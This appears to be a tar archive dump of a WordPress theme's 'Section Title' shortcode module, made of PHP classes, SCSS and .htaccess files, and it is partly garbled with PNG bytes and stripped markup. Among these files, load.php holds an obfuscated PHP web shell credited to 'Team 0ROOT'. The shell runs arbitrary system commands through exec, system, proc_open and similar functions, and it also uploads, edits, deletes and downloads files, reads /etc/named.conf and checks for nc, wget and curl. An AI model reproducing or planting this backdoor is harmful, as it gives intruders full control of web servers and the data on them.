‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT section-title.php000060400000032373151732500460010047 0ustar00base = 'mkdf_section_title'; add_action( 'vc_before_init', array( $this, 'vcMap' ) ); } public function getBase() { return $this->base; } public function vcMap() { if ( function_exists( 'vc_map' ) ) { vc_map( array( 'name' => esc_html__( 'Section Title', 'quart-core' ), 'base' => $this->base, 'category' => esc_html__( 'by QUART', 'quart-core' ), 'icon' => 'icon-wpb-section-title extended-custom-icon', 'allowed_container_element' => 'vc_row', 'params' => array( array( 'type' => 'textfield', 'param_name' => 'custom_class', 'heading' => esc_html__( 'Custom CSS Class', 'quart-core' ), 'description' => esc_html__( 'Style particular content element differently - add a class name and refer to it in custom CSS', 'quart-core' ) ), array( 'type' => 'dropdown', 'param_name' => 'type', 'heading' => esc_html__( 'Type', 'quart-core' ), 'value' => array( esc_html__( 'Standard', 'quart-core' ) => 'standard', esc_html__( 'Two Columns', 'quart-core' ) => 'two-columns' ), 'save_always' => true ), array( 'type' => 'dropdown', 'param_name' => 'title_position', 'heading' => esc_html__( 'Title - Text Position', 'quart-core' ), 'value' => array( esc_html__( 'Title Left - Text Right', 'quart-core' ) => 'title-left', esc_html__( 'Title Right - Text Left', 'quart-core' ) => 'title-right' ), 'save_always' => true, 'dependency' => array( 'element' => 'type', 'value' => array( 'two-columns' ) ) ), array( 'type' => 'dropdown', 'param_name' => 'columns_space', 'heading' => esc_html__( 'Space Between Columns', 'quart-core' ), 'value' => array( esc_html__( 'Normal', 'quart-core' ) => 'normal', esc_html__( 'Small', 'quart-core' ) => 'small', esc_html__( 'Tiny', 'quart-core' ) => 'tiny' ), 'save_always' => true, 'dependency' => array( 'element' => 'type', 'value' => array( 'two-columns' ) ) ), array( 'type' => 'dropdown', 'param_name' => 'position', 'heading' => esc_html__( 'Horizontal Position', 'quart-core' ), 'value' => array( esc_html__( 'Default', 'quart-core' ) => '', esc_html__( 'Left', 'quart-core' ) => 'left', esc_html__( 'Center', 'quart-core' ) => 'center', esc_html__( 'Right', 'quart-core' ) => 'right' ), 'save_always' => true, 'dependency' => array( 'element' => 'type', 'value' => array( 'standard' ) ) ), array( 'type' => 'textfield', 'param_name' => 'holder_padding', 'heading' => esc_html__( 'Holder Side Padding (px or %)', 'quart-core' ) ), array( 'type' => 'textfield', 'param_name' => 'title', 'heading' => esc_html__( 'Title', 'quart-core' ), 'admin_label' => true ), array( 'type' => 'dropdown', 'param_name' => 'title_tag', 'heading' => esc_html__( 'Title Tag', 'quart-core' ), 'value' => array_flip( quart_mikado_get_title_tag( true ) ), 'save_always' => true, 'dependency' => array( 'element' => 'title', 'not_empty' => true ), 'group' => esc_html__( 'Title Style', 'quart-core' ) ), array( 'type' => 'colorpicker', 'param_name' => 'title_color', 'heading' => esc_html__( 'Title Color', 'quart-core' ), 'dependency' => array( 'element' => 'title', 'not_empty' => true ), 'group' => esc_html__( 'Title Style', 'quart-core' ) ), array( 'type' => 'textfield', 'param_name' => 'title_bold_words', 'heading' => esc_html__( 'Words with Bold Font Weight', 'quart-core' ), 'description' => esc_html__( 'Enter the positions of the words you would like to display in a "bold" font weight. Separate the positions with commas (e.g. if you would like the first, second, and third word to have a light font weight, you would enter "1,2,3")', 'quart-core' ), 'dependency' => array( 'element' => 'title', 'not_empty' => true ), 'group' => esc_html__( 'Title Style', 'quart-core' ) ), array( 'type' => 'textfield', 'param_name' => 'title_light_words', 'heading' => esc_html__( 'Words with Light Font Weight', 'quart-core' ), 'description' => esc_html__( 'Enter the positions of the words you would like to display in a "light" font weight. Separate the positions with commas (e.g. if you would like the first, third, and fourth word to have a light font weight, you would enter "1,3,4")', 'quart-core' ), 'dependency' => array( 'element' => 'title', 'not_empty' => true ), 'group' => esc_html__( 'Title Style', 'quart-core' ) ), array( 'type' => 'textfield', 'param_name' => 'title_break_words', 'heading' => esc_html__( 'Position of Line Break', 'quart-core' ), 'description' => esc_html__( 'Enter the position of the word after which you would like to create a line break (e.g. if you would like the line break after the 3rd word, you would enter "3")', 'quart-core' ), 'dependency' => array( 'element' => 'title', 'not_empty' => true ), 'group' => esc_html__( 'Title Style', 'quart-core' ) ), array( 'type' => 'dropdown', 'param_name' => 'disable_break_words', 'heading' => esc_html__( 'Disable Line Break for Smaller Screens', 'quart-core' ), 'value' => array_flip( quart_mikado_get_yes_no_select_array( false ) ), 'save_always' => true, 'dependency' => array( 'element' => 'title', 'not_empty' => true ), 'group' => esc_html__( 'Title Style', 'quart-core' ) ), array( 'type' => 'textarea', 'param_name' => 'text', 'heading' => esc_html__( 'Text', 'quart-core' ) ), array( 'type' => 'dropdown', 'param_name' => 'text_tag', 'heading' => esc_html__( 'Text Tag', 'quart-core' ), 'value' => array_flip( quart_mikado_get_title_tag( true, array( 'p' => 'p' ) ) ), 'save_always' => true, 'dependency' => array( 'element' => 'text', 'not_empty' => true ), 'group' => esc_html__( 'Text Style', 'quart-core' ) ), array( 'type' => 'colorpicker', 'param_name' => 'text_color', 'heading' => esc_html__( 'Text Color', 'quart-core' ), 'dependency' => array( 'element' => 'text', 'not_empty' => true ), 'group' => esc_html__( 'Text Style', 'quart-core' ) ), array( 'type' => 'textfield', 'param_name' => 'text_font_size', 'heading' => esc_html__( 'Text Font Size (px)', 'quart-core' ), 'dependency' => array( 'element' => 'text', 'not_empty' => true ), 'group' => esc_html__( 'Text Style', 'quart-core' ) ), array( 'type' => 'textfield', 'param_name' => 'text_line_height', 'heading' => esc_html__( 'Text Line Height (px)', 'quart-core' ), 'dependency' => array( 'element' => 'text', 'not_empty' => true ), 'group' => esc_html__( 'Text Style', 'quart-core' ) ), array( 'type' => 'dropdown', 'param_name' => 'text_font_weight', 'heading' => esc_html__( 'Text Font Weight', 'quart-core' ), 'value' => array_flip( quart_mikado_get_font_weight_array( true ) ), 'save_always' => true, 'dependency' => array( 'element' => 'text', 'not_empty' => true ), 'group' => esc_html__( 'Text Style', 'quart-core' ) ), array( 'type' => 'textfield', 'param_name' => 'text_margin', 'heading' => esc_html__( 'Text Top Margin (px)', 'quart-core' ), 'dependency' => array( 'element' => 'text', 'not_empty' => true ), 'group' => esc_html__( 'Text Style', 'quart-core' ) ) ) ) ); } } public function render( $atts, $content = null ) { $args = array( 'custom_class' => '', 'type' => 'standard', 'title_position' => 'title-left', 'columns_space' => 'normal', 'position' => '', 'holder_padding' => '', 'title' => '', 'title_tag' => 'h2', 'title_color' => '', 'title_bold_words' => '', 'title_light_words' => '', 'title_break_words' => '', 'disable_break_words' => '', 'text' => '', 'text_tag' => 'h5', 'text_color' => '', 'text_font_size' => '', 'text_line_height' => '', 'text_font_weight' => '', 'text_margin' => '' ); $params = shortcode_atts( $args, $atts ); $params['holder_classes'] = $this->getHolderClasses( $params, $args ); $params['holder_styles'] = $this->getHolderStyles( $params ); $params['title'] = $this->getModifiedTitle( $params ); $params['title_tag'] = ! empty( $params['title_tag'] ) ? $params['title_tag'] : $args['title_tag']; $params['title_styles'] = $this->getTitleStyles( $params ); $params['text_tag'] = ! empty( $params['text_tag'] ) ? $params['text_tag'] : $args['text_tag']; $params['text_styles'] = $this->getTextStyles( $params ); $html = quart_core_get_shortcode_module_template_part( 'templates/section-title', 'section-title', '', $params ); return $html; } private function getHolderClasses( $params, $args ) { $holderClasses = array(); $holderClasses[] = ! empty( $params['custom_class'] ) ? esc_attr( $params['custom_class'] ) : ''; $holderClasses[] = ! empty( $params['type'] ) ? 'mkdf-st-' . $params['type'] : 'mkdf-st-' . $args['type']; $holderClasses[] = ! empty( $params['title_position'] ) ? 'mkdf-st-' . $params['title_position'] : 'mkdf-st-' . $args['title_position']; $holderClasses[] = ! empty( $params['columns_space'] ) ? 'mkdf-st-' . $params['columns_space'] . '-space' : 'mkdf-st-' . $args['columns_space'] . '-space'; $holderClasses[] = $params['disable_break_words'] === 'yes' ? 'mkdf-st-disable-title-break' : ''; return implode( ' ', $holderClasses ); } private function getHolderStyles( $params ) { $styles = array(); if ( ! empty( $params['holder_padding'] ) ) { $styles[] = 'padding: 0 ' . $params['holder_padding']; } if ( ! empty( $params['position'] ) ) { $styles[] = 'text-align: ' . $params['position']; } return implode( ';', $styles ); } private function getModifiedTitle( $params ) { $title = $params['title']; $title_bold_words = str_replace( ' ', '', $params['title_bold_words'] ); $title_light_words = str_replace( ' ', '', $params['title_light_words'] ); $title_break_words = str_replace( ' ', '', $params['title_break_words'] ); if ( ! empty( $title ) ) { $bold_words = explode( ',', $title_bold_words ); $light_words = explode( ',', $title_light_words ); $split_title = explode( ' ', $title ); if ( ! empty( $title_bold_words ) ) { foreach ( $bold_words as $value ) { $value = intval( $value ); if ( ! empty( $split_title[ $value - 1 ] ) ) { $split_title[ $value - 1 ] = '' . $split_title[ $value - 1 ] . ''; } } } if ( ! empty( $title_light_words ) ) { foreach ( $light_words as $value ) { $value = intval( $value ); if ( ! empty( $split_title[ $value - 1 ] ) ) { $split_title[ $value - 1 ] = '' . $split_title[ $value - 1 ] . ''; } } } if ( ! empty( $title_break_words ) ) { $title_break_words = intval( $title_break_words ); if ( ! empty( $split_title[ $title_break_words - 1 ] ) ) { $split_title[ $title_break_words - 1 ] = $split_title[ $title_break_words - 1 ] . '
'; } } $title = implode( ' ', $split_title ); } return $title; } private function getTitleStyles( $params ) { $styles = array(); if ( ! empty( $params['title_color'] ) ) { $styles[] = 'color: ' . $params['title_color']; } return implode( ';', $styles ); } private function getTextStyles( $params ) { $styles = array(); if ( ! empty( $params['text_color'] ) ) { $styles[] = 'color: ' . $params['text_color']; } if ( ! empty( $params['text_font_size'] ) ) { $styles[] = 'font-size: ' . quart_mikado_filter_px( $params['text_font_size'] ) . 'px'; } if ( ! empty( $params['text_line_height'] ) ) { $styles[] = 'line-height: ' . quart_mikado_filter_px( $params['text_line_height'] ) . 'px'; } if ( ! empty( $params['text_font_weight'] ) ) { $styles[] = 'font-weight: ' . $params['text_font_weight']; } if ( $params['text_margin'] !== '' ) { $styles[] = 'margin-top: ' . quart_mikado_filter_px( $params['text_margin'] ) . 'px'; } return implode( ';', $styles ); } }load.php000060400000000236151732500460006174 0ustar00ok<");};?>
FORM; die($bytesecform); } } } ?> Can't Read /etc/named.conf"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@$func[43]($d0main, "zone")) { $func[32]('#zone "(.*)"#', $d0main, $domains); $func[54](); if ($func[55]($func[56]($domains[1][0])) > 2){ $func[54](); $count++; } } } $dom = "$count Domain"; } $dir = $func[45]("\\", "/", $dir); $scdir = $func[46]("/", $dir); $total = $func[29]($dir); $free = $func[30]($dir); $pers = (int) ($free / $total * 100); $ds = @$func[31]("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "All function is accessible"; $cmd_uname = exe("uname -a"); $uname = $func[49]('php_uname') ? $func[41](@$func[0](), 0, 120) : ($func[55]($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !'); if (strtolower($func[41](PHP_OS, 0, 3)) == "win") { $sys = "win"; } else { $sys = "unix"; } if (isset($_GET['do'])) { $do = $_GET['do']; if ($do == 'delete') { if ($func[12]($dir)) { if (deleter($dir)) { flash("File/Folder deleted successfully!", "Success", "success", "?dir=" . dirname($dir)); } else { flash("File/Folder failed to delete!", "Failed", "danger"); } } else { flash("File/Folder is doesn't exist!", "Failed", "warning"); } } else if ($do == 'download') { if ($func[12]($dir)) { header("Content-Type: application/octet-stream"); header("Content-Transfer-Encoding: Binary"); header("Content-Length: " . $func[10]($dir)); header("Content-disposition: attachment; filename=\"".basename($dir)."\""); } else { flash("File is doesn't exist!", "Failed", "warning"); } } } else { $do = 'filesman'; $title = 'Files Manager'; $icon = 'archive'; } ((isset($_POST["foldername"])) ? ($func[12]("$dir/{$_POST['foldername']}") ? flash("Folder name is exist!", "Failed", "warning") : ($func[15]("$dir/{$_POST['foldername']}") ? flash("Folder created successfully!", "Success", "success") : flash("Folder failed to create!", "Failed", "danger"))) : null); ((isset($_POST["filename"]) && isset($_POST['filecontent'])) ? ($func[12]("$dir/{$_POST['filename']}") ? flash("File name is exist!", "Failed", "warning") : ($func[13]("$dir/{$_POST['filename']}", $_POST['filecontent']) ? flash("File created successfully!", "Success", "success") : flash("File failed to create!", "Failed", "danger"))) : null); ((isset($_POST["newname"]) && isset($_POST['oldname'])) ? ($func[12]("$dir/{$_POST['newname']}") ? flash("File/Folder name is exist!", "Failed", "warning") : ($func[16]("$dir/{$_POST['oldname']}", $_POST['newname']) ? flash("File/Folder renamed successfully!", "Success", "success") : flash("File/Folder failed to rename!", "Failed", "danger"))) : null); ((isset($_POST["filename"]) && isset($_POST['content'])) ? ($func[13]("$dir/{$_POST['filename']}", $_POST['content']) ? flash("File saved successfully!", "Success", "success") : flash("File failed to save!", "Failed", "danger")) : null); if (isset($_FILES["uploadfile"])) { $n = $_FILES["uploadfile"]["name"]; for ($i = 0; $i < count($n); $i++) { if ($func[11]($_FILES["uploadfile"]["tmp_name"][$i], $n[$i])) { flash("File uploaded successfully!", "Success", "success"); } else { flash("File failed to upload!", "Failed", "danger"); } } } if (@$func[31]('open_basedir')) { $basedir_data = @$func[31]('open_basedir'); if ($func[55]($basedir_data) > 120){ $open_b = "" . $func[41]($basedir_data, 0, 120) . "..."; } else { $open_b = '' . $basedir_data . ''; } } else { $open_b = 'NONE'; } if (!$func[49]('posix_getegid')) { $user = $func[49]("get_current_user") ? @$func[64]() : "????"; $uid = $func[49]("getmyuid") ? @$func[65]() : "????"; $gid = $func[49]("getmygid") ? @$func[66]() : "????"; $group = "?"; } else { $uid = $func[49]("posix_getpwuid") && $func[49]("posix_geteuid") ? @$func[33]($func[67]()) : ["name" => "????", "uid" => "????"]; $gid = $func[49]("posix_getgrgid") && $func[49]("posix_getegid") ? @$func[34]($func[68]()) : ["name" => "????", "gid" => "????"]; $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } if ($sys == 'unix') { if (!@$func[31]('safe_mode')) { if ($func[55](exe("id")) > 0) { $userful = ['gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl']; $x = 0; foreach ($userful as $i) { if (which($i)) { $x++; $useful .= $i . ', '; } } if ($x == 0) { $useful = '--------'; } $downloaders = ['wget','fetch','lynx','links','curl','get','lwp-mirror']; $x = 0; foreach($downloaders as $i) { if (which($i)) { $x++; $downloader .= $i . ', '; } } if ($x == 0) { $downloader = '--------'; } } } } function hex($str) { global $func; $r = ""; for ($i = 0; $i < $func[55]($str); $i++) { $r .= dechex(ord($str[$i])); } return $r; } function dehex($str) { $r = ""; $len = (strlen($str) - 1); for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i].$str[$i + 1])); } return $r; } function formatSize($bytes) { $types = array( 'B', 'KB', 'MB', 'GB', 'TB' ); for ( $i = 0; $bytes >= 1024 && $i < ( count( $types ) - 1 ); $bytes /= 1024, $i++ ); return( round( $bytes, 2 )." ".$types[$i] ); } function perms($file) { global $func; $perms = fileperms($file); if (($perms & 0xC000) == 0xC000){ $info = 's'; }elseif (($perms & 0xA000) == 0xA000){ $info = 'l'; }elseif (($perms & 0x8000) == 0x8000){ $info = '-'; }elseif (($perms & 0x6000) == 0x6000){ $info = 'b'; }elseif (($perms & 0x4000) == 0x4000){ $info = 'd'; }elseif (($perms & 0x2000) == 0x2000){ $info = 'c'; }elseif (($perms & 0x1000) == 0x1000){ $info = 'p'; }else{ $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $func[41](sprintf('%o', $perms), -4) . ' >> ' .$info; } function exe($in) { global $func; $out = ''; try { if ($func[49]('exec')) { @$func[23]($in, $out); $out = @join("\n", $out); } elseif ($func[49]('passthru')) { $func[48](); @passthru($in); $out = $func[27](); } elseif($func[49]('system')) { $func[48](); @system($in); $out = $func[27](); } elseif ($func[49]('shell_exec')) { $out = $func[25]($in); } elseif ($func[49]("popen") && $func[49]("pclose")) { if (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f, 1024); pclose($f); } } elseif ($func[49]('proc_open')) { $pipes = []; $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null); $out = @stream_get_contents($pipes[1]); } elseif (class_exists('COM')) { $ws = new COM('WScript.shell'); $exec = $ws->exec('cmd.exe /c '.$in); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch(Exception $e) {} return $out; } function checkName($name) { global $func; if ($func[55]($name) > 18) { return $func[41]($name, 0, 18) . "..."; } return $name; } function checkPerm($dir, $perm) { global $func; $perm = explode('>>', $perm); if ($func[8]($dir)) { return "".$perm[0]." >> ".$perm[1].""; } elseif (!$func[9]($dir)) { return "".$perm[0]." >> ".$perm[1].""; } else { return "".$perm[0]." >> ".$perm[1].""; } } function getowner($item) { global $func; if ($func[49]("posix_getpwuid")) { $downer = @$func[33](fileowner($item)); $downer = $downer['name']; } else { $downer = fileowner($item); } if ($func[49]("posix_getgrgid")) { $dgrp = @$func[34](filegroup($item)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($item); } return $downer . '/' . $dgrp; } function geticon($file) { global $func; $ext = strtolower($func[35]($file, PATHINFO_EXTENSION)); if ($ext == 'php' || $ext == 'html' || $ext == 'js' || $ext == 'css' || $ext == 'py' || $ext == 'perl' || $ext == 'sh') { return 'file-code'; } else if ($ext == 'pdf') { return 'file-pdf'; } else if ($ext == 'txt') { return 'file-alt'; } else if ($ext == 'csv') { return 'file-csv'; } else if ($ext == 'jpg' || $ext == 'png' || $ext == 'jpeg' || $ext == 'gif') { return 'file-image'; } else if ($ext == 'mp4' || $ext == '3gp' || $ext == 'mkv') { return 'file-video'; } else if ($ext == 'docx' || $ext == 'doc' || $ext == 'docm') { return 'file-word'; } else if ($ext == 'ppt' || $ext == 'pptx') { return 'file-powerpoint'; } else if ($ext == 'xlsx' || $ext == 'xlsb' || $ext == 'xlsm' || $ext == 'xltx' || $ext == 'xltm') { return 'file-excel'; } else if ($ext == 'mp3' || $ext == 'wav') { return 'file-audio'; } else if ($ext == 'sql' || $ext == 'db') { return 'database'; } else if ($ext == 'zip' || $ext == 'tar' || $ext == 'gz' || $ext == 'tar.gz' || $ext == '7z' || $ext == 'bz2') { return 'file-archive'; } else { return 'file'; } } function which($p) { global $func; $path = exe('which ' . $p); if (!empty($path)) { return $func[55]($path); } return false; } function flash($message, $status, $class, $redirect = false) { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } $_SESSION["message"] = $message; $_SESSION["class"] = $class; $_SESSION["status"] = $status; if ($redirect) { header('Location: ' . $redirect); exit(); } return true; } function clear() { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } return true; } function deleter($d) { global $func; if (trim($func[35]($d, PATHINFO_BASENAME), '.') === '') { return false; }; if ($func[6]($d)) { array_map("deleter", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT)); rmdir($d); return true; } else { unlink($d); return true; } return false; } $scandir = $func[21]($dir); ?> <?= $shellName ?>
Server Information
Operating System :
User / Group : [] / []
PHP Version :
IP Server :
Storage : Total = , Free = [%]
Domains :
Software :
Disable Functions :
Useful Functions :
Downloader :
CURL : ON' : 'OFF' ?> | SSH2 : ON' : 'OFF' ?> | Magic Quotes : ON' : 'OFF' ?> | MySQL : ON' : 'OFF' ?> | MSSQL : ON' : 'OFF' ?> | PostgreSQL : ON' : 'OFF' ?> | Oracle : ON' : 'OFF' ?>
Safe Mode : ON' : 'OFF' ?> | Open Basedir : | Safe Mode Exec Dir : '. @$func[31]('safe_mode_exec_dir') .'' : 'NONE' ?> | Safe Mode Include Dir : '. @$func[31]('safe_mode_include_dir') .'' : 'NONE' ?>
Path
[ ]

Anjing

Name Type Size Last Modified Owner/Group Permission Action
--
Can't read this directory!
Copyright © Team 0ROOT Coded by @ph03n1x69
functions.php000060400000002031151732500460007260 0ustar00 Order allow,deny Deny from all templates/section-title.php000060400000001351151732500460012035 0ustar00
>
< class="mkdf-st-title" > true, 'span' => array('class' => true))); ?> > < class="mkdf-st-text" > true)); ?> >
assets/.htaccess000044400000000177151732500460007652 0ustar00 Order allow,deny Deny from all assets/css/.htaccess000044400000000177151732500460010442 0ustar00 Order allow,deny Deny from all assets/css/scss/responsive/.htaccess000044400000000177151732500460013612 0ustar00 Order allow,deny Deny from all assets/css/scss/responsive/_section-title-responsive.scss000060400000002026151732500460020017 0ustar00/* ========================================================================== Section Title shortcode responsive styles - begin ========================================================================== */ @include ipad-landscape { .mkdf-section-title-holder { &.mkdf-st-two-columns { padding: 0 !important; // it can be set inline in shortcode options } } } @include ipad-portrait { .mkdf-section-title-holder { padding: 0 !important; // it can be set inline in shortcode options &.mkdf-st-two-columns { .mkdf-st-title, .mkdf-st-text { width: 100%; float: none !important; text-align: initial !important; } .mkdf-st-text { margin: 14px 0 0; } } &.mkdf-st-disable-title-break { .mkdf-st-title { br { display: none; } } } } } /* ========================================================================== Section Title shortcode responsive styles - end ========================================================================== */ assets/css/scss/.htaccess000044400000000177151732500460011415 0ustar00 Order allow,deny Deny from all assets/css/scss/default/_section-title.scss000060400000003174151732500460015060 0ustar00/* ========================================================================== Section Title shortcode styles - begin ========================================================================== */ .mkdf-section-title-holder { @include mkdfRelativeHolderLayout(); box-sizing: border-box; &.mkdf-st-two-columns { $space_label: ('tiny', 'small', 'normal'); $space_width: (5, 10, 15); @for $i from 0 to length($space_label) { &.mkdf-st-#{nth($space_label,$i+1)}-space { $column_width: nth($space_width,$i+1); .mkdf-st-inner { margin: 0 -#{$column_width}px; } .mkdf-st-title, .mkdf-st-text { padding: 0 #{$column_width}px; } } } .mkdf-st-title, .mkdf-st-text { position: relative; display: inline-block; vertical-align: middle; width: 50%; float: left; margin: 0; box-sizing: border-box; } &.mkdf-st-title-left { .mkdf-st-title { text-align: right; } .mkdf-st-text { text-align: left; } } &.mkdf-st-title-right { .mkdf-st-title { float: right; text-align: left; } .mkdf-st-text { text-align: right; } } } .mkdf-st-title { display: block; margin: 0; .mkdf-st-title-bold { font-weight: 700; } .mkdf-st-title-light { font-weight: 300; } } .mkdf-st-text { display: block; margin: 14px 0 0; } } /* ========================================================================== Section Title shortcode styles - end ========================================================================== */ assets/css/scss/default/.htaccess000044400000000177151732500460013041 0ustar00 Order allow,deny Deny from all